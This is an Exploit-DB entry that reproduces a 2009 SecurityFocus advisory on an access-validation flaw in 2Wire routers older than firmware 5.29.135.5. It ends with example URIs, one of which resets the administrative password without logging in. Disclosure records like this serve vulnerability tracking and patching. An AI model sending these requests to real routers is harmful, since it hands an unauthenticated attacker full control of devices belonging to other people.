2WIRE Routers - 'CD35_SETUP_01' Access Validation

EDB-ID:

33165

CVE:

N/A


Author:

hkm

Type:

remote


Platform:

Hardware

Date:

2009-08-12


source: https://www.securityfocus.com/bid/36031/info

Multiple 2Wire routers are prone to an access-validation vulnerability because they fail to adequately authenticate users before performing certain actions.

Unauthenticated attackers can leverage this issue to change the router's administrative password. Successful attacks will completely compromise affected devices.

2Wire routers prior to Firmware version 5.29.135.5 are vulnerable. 

The following example URIs are available:

http://gateway.example.net?xslt?page=CD35_SETUP_01
http://gateway.example.net/xslt?PAGE=CD35_SETUP_01_POST&password1=*Ax512*&password2=*Ax512*